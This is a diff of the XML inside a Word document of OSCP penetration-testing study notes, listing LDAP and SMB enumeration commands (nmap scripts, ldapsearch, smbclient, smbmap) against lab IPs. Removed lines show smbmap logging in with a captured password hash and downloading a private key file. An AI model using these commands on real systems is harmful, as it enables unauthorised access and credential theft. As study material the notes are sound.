--- a/OSCP NOTES.docx
+++ b/OSCP NOTES.docx
@@ -341,11 +341,9 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>ldapsearch</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -386,59 +384,21 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -p 389 --script </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ldap-rootdse</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Pn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 10.10.10.107</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nmap -p 389 --script ldap-rootdse -Pn </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -469,59 +429,21 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -p 389 --script </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ldap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-search -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Pn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 10.10.10.107</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nmap -p 389 --script ldap-search -Pn </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -597,49 +519,29 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ldapsearch</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -x -h 10.10.10.107</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -s base -b ‘dc=&lt;&lt;DC-1&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&gt;,dc</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>=&lt;&lt;DC-2&gt;&gt;’</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ldapsearch -x -h </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -s base -b ‘dc=&lt;&lt;DC-1&gt;&gt;,dc=&lt;&lt;DC-2&gt;&gt;’</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -655,41 +557,29 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ldapsearch</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -x -h 10.10.10.107 -s sub -b ‘dc=&lt;&lt;DC-1&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&gt;,dc</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>=&lt;&lt;DC-2&gt;&gt;’</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ldapsearch -x -h </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -s sub -b ‘dc=&lt;&lt;DC-1&gt;&gt;,dc=&lt;&lt;DC-2&gt;&gt;’</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -781,7 +671,6 @@
                               </w:rPr>
                               <w:t xml:space="preserve"> a </w:t>
                             </w:r>
-                            <w:proofErr w:type="spellStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:b/>
@@ -791,7 +680,6 @@
                               </w:rPr>
                               <w:t>sambaNTPassword</w:t>
                             </w:r>
-                            <w:proofErr w:type="spellEnd"/>
                             <w:r>
                               <w:rPr>
                                 <w:color w:val="000000" w:themeColor="text1"/>
@@ -800,7 +688,6 @@
                               <w:t xml:space="preserve">? Head over to </w:t>
                             </w:r>
                             <w:hyperlink w:anchor="_Login_Using_SambaNTPassword" w:history="1">
-                              <w:proofErr w:type="spellStart"/>
                               <w:r>
                                 <w:rPr>
                                   <w:rStyle w:val="Hyperlink"/>
@@ -810,7 +697,6 @@
                                 </w:rPr>
                                 <w:t>smbmap</w:t>
                               </w:r>
-                              <w:proofErr w:type="spellEnd"/>
                             </w:hyperlink>
                             <w:r>
                               <w:rPr>
@@ -872,7 +758,6 @@
                         </w:rPr>
                         <w:t xml:space="preserve"> a </w:t>
                       </w:r>
-                      <w:proofErr w:type="spellStart"/>
                       <w:r>
                         <w:rPr>
                           <w:b/>
@@ -882,7 +767,6 @@
                         </w:rPr>
                         <w:t>sambaNTPassword</w:t>
                       </w:r>
-                      <w:proofErr w:type="spellEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:color w:val="000000" w:themeColor="text1"/>
@@ -891,7 +775,6 @@
                         <w:t xml:space="preserve">? Head over to </w:t>
                       </w:r>
                       <w:hyperlink w:anchor="_Login_Using_SambaNTPassword" w:history="1">
-                        <w:proofErr w:type="spellStart"/>
                         <w:r>
                           <w:rPr>
                             <w:rStyle w:val="Hyperlink"/>
@@ -901,7 +784,6 @@
                           </w:rPr>
                           <w:t>smbmap</w:t>
                         </w:r>
-                        <w:proofErr w:type="spellEnd"/>
                       </w:hyperlink>
                       <w:r>
                         <w:rPr>
@@ -964,14 +846,12 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>smbmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>smbclient</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -980,46 +860,11 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Login_Using_SambaNTPassword"/>
-      <w:bookmarkStart w:id="2" w:name="_Got_a_SambaNTPassword?"/>
-      <w:bookmarkEnd w:id="1"/>
-      <w:bookmarkEnd w:id="2"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Got a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>SambaNTPassword</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Login</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>List Shares</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1033,84 +878,65 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>smbmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -u &lt;&lt;username&gt;&gt; -p ‘&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sambaNTP</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&gt;&gt;:&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sambaNTP</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&gt;&gt;’</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -H 10.10.10.107</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>List Contents of Newly Found Share</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>smbclient -L //&lt;&lt;ip&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e.g.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>smbclient -L //10.10.10.100</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Login to Share</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1124,76 +950,83 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>smbclient //&lt;&lt;ip&gt;&gt;/&lt;&lt;share&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e.g.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>smbclient //10.10.10.100/Replication</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>smbmap</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -u &lt;&lt;username&gt;&gt; -p ‘&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sambaNTP</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&gt;&gt;:&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sambaNTP</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&gt;&gt;’ -H 10.10.10.107 -R</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Download Newly Found File</w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="1" w:name="_Login_Using_SambaNTPassword"/>
+      <w:bookmarkStart w:id="2" w:name="_Got_a_SambaNTPassword?"/>
+      <w:bookmarkEnd w:id="1"/>
+      <w:bookmarkEnd w:id="2"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>List Shares with Permissions</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1204,80 +1037,114 @@
           <w:numId w:val="2"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>smbmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -u &lt;&lt;username&gt;&gt; -p ‘&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sambaNTP</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&gt;&gt;:&lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sambaNTP</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&gt;&gt;’ -H 10.10.10.107 --download &lt;&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>shareName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&gt;&gt;/&lt;&lt;filename&gt;&gt;</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">smbmap -H </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">List All Contents (Recursively) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>f Share</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">smbmap -R </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;&lt;share-name&gt;&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -H </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;&lt;ip&gt;&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --depth </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;&lt;depth&gt;&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1288,6 +1155,8 @@
           <w:numId w:val="2"/>
         </w:numPr>
         <w:rPr>
+          <w:i/>
+          <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
@@ -1306,90 +1175,26 @@
           <w:numId w:val="2"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>smbmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -u alice1978 -p ‘0B13672F89372DBC:0B13672F89372DBC’ -H 10.10.10.107 --download </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>alice</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>my_private_key.ppk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>DNS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Initial Setup</w:t>
-      </w:r>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>smbmap -R Replication -H 10.10.10.100 --depth 10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1402,30 +1207,38 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>resolv.conf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Got a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>SambaNTPassword</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Login</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1440,94 +1253,44 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Add IP address to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">top of </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
